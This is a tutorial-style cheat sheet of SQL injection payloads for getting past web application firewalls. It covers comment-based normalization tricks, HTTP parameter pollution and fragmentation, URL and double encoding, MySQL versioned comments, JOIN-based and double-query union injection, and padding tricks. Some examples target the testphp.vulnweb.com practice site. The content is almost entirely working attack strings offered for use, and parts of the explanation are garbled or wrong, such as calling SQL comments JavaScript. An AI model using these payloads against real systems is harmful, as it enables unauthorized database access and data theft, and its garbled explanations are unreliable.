#A# Bypassing WAF: SQL Injection - Normal Method
(1) of a vulnerability in the function of request Normalization.
• The following request doesn’t allow anyone to conduct an attack
/?id=1+union+select+1,2,3/*
• If there is a corresponding vulnerability in the WAF, this request
will be successfully performed
/?id=1/*union*/union/*select*/select+1,2,3/*
• After being processed by WAF, the request will become
index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*
The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source.
(2) of a vulnerability in the function of request Normalization.
• Similarly, the following request doesn’t allow anyone to conduct an attack
/?id=1+union+select+1,2,3/*
• If there is a corresponding vulnerability in the WAF, this request will be successfully performed
/?id=1+un/**/ion+sel/**/ect+1,2,3--
• The SQL request will become
SELECT * from table where id =1 union select 1,2,3--
Instead of construction /**/, any symbol sequence that WAF cuts off can be used .
The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string).
(3) Using HTTP Parameter Pollution (HPP)
• The following request doesn’t allow anyone to conduct an attack
/?id=1;select+1,2,3+from+users+where+id=1--
• This request will be successfully performed using HPP
/?id=1;select+1&id=2,3+from+users+where+id=1--
Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked.
(4) Using HTTP Parameter Pollution (HPP)
• Vulnerable code
SQL=" select key from table where id= "+Request.QueryString("id")
• This request is successfully performed using the HPP technique
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
• The SQL request becomes select key from table where
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
ByPassing WAF: SQL Injection – HPF
Using HTTP Parameter Fragmentation (HPF)
• Vulnerable code example
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);
• The following request doesn’t allow anyone to conduct an attack
/?a=1+union+select+1,2/*
• These requests may be successfully performed using HPF
/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
• The SQL requests become
select * from table where a=1 union/* and b=*/select 1,2
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--
(5) Using distinct & distinctROW
+union+distinct+select+
+union+distinctROW+select+
+union%20distinct%20select+
+union%20%64istinctRO%57%20select+
(6) using [ HTTP encoding ] [ URL encoded WAF bypass Payload ] [ double encoding ]
if the waf blocks 'union' and 'select' together, so the way to bypass that is just use Union %23aa%0a Select.
[url encoded]
+%55nion %53elect %55nion(%53elect)
[Space (%20); #Most commonly used]
+union%20select%20
/%2A%2A/union/%2A%2A/select
%252f%252a*/UNION%252f%252a*/SELECT
[multi-line comments /**/] –
[id=999999.9%2F**%2FuNiOn%2F**%2FaLl%2F**%2FsElEcT%2F**%2F]
Multi-line comments start with /* and end with */.
Any text between /* and */ will be ignored by JavaScript.
%2F**%2Funion%2F**%2Fselect
/**/UnIoN/**/SeLecT/**/
/*!50000Union*/ SeLEct
/*!50000UnIoN*/ /*!50000SeLeCt*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
/**YmxhY2tyb3Nl**/UnIoN/**YmxhY2tyb3Nl**/SeLecT/**YmxhY2tyb3Nl**/
(7) using Parenthesis instead of space ()
+(uNioN)+(sElECt)
+union (select 1,2,3,4,5)
union(select(1),2,3,4,5)
union(select(1),(2),(3),(4),(5))
(-1)union(select(1),(2),(3),(4),(5))
1%')and(0)union(select(1),1,3,4,5,6)%23%23%23
union(select(0),version(),(0),(0),(0),(0))
UNION(SELECT/**_**/(1),2),(3),(4),(5),(6),(7),(8),(9))-- -
(8) using Cut-Off Techique
+UNunionION+SEselectLECT+
(9) using Variable Method | WAF after union select |
http://pastebin.com/8Xd7QrWK
(10) using routed query(double query) injection.
routed query(double query) injection, For that we will put a single quotation after the number of columns. Lets see
index.php?cat=1 and false UNION SELECT 1',2,3,4,5,6-- -
(here we have also got a sql error and we will also fix it to continue)
We have to bound the column number with double quotation(")
index.php?cat=1 and false UNION SELECT "1' -- -",2-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4,5-- - (Error)
index.php?cat=1 and false UNION SELECT "1' -- -",2,3,4,5,6-- - (now query is fixed)
http://testphp.vulnw...s.php?artist=-1 UNION SELECT 1,2,3-- -",2,3,4,5,6-- -
let's see vedio for this meathod
(11) using JOIN syntaxes .
The INNER JOIN keyword selects all rows from both tables as long as there is a match between the columns in both tables.
http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1,2,3-- -
After query UNION SELECT add *
artists.php?artist=-1 UNION SELECT *
then add FR0M
artists.php?artist=-1 UNION SELECT * FR0M
Then shut down each column brackets (select+1) then This column give him a nickname (select+1)a Then link between him and the ather column by JOIN like
artists.php?artist=-1 union select * from (select 1)a join (select 2)b join (select 3)c -- -
http://testphp.vulnweb.com/artists.php?artist=-1+union+select+*+from+(select+1)a+join+(select+2)b+join+(select+3)c -- -
(12) using Buffer Overflow .
the waf blocks 'union' and 'select' together [Forbidden], so the way to bypass that is just use Union %23aa%0a Select .
--%23%0a/*!50000union*/%23AAAAAAAA%0a/*!50000select*/%23AAAAAAAA%0a+
or use this method
+and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s) then added befor union select like .
/*50000and*/(/*!50000%53elect*/ 1)=(/*!32302%53elect*/ 0xAAAAAA 1000 more A’s) /**/ /*!50000%union*/ /*!50000%53elect*/ 1,2,3-- - etc
(13) using Columns seperator Style WAF bypass .
if we bypassing union select but we get waf when added column number then we test it and added Columns seperator befor column number that have a waf like .
id=4'*2e9unioN Select!1,2%23
id=4'*2e9unioN Select!1,2,3%23
id=4'*2e9unioN Select!1,2,3,4%23
id=4'*2e9unioN Select!1,2,3,4,5%23
WAF after 3 columns lets use Columns seperator Style WAF bypass
Bypassed :- id=4'*2e9unioN Select!1,2,3,~4,5%23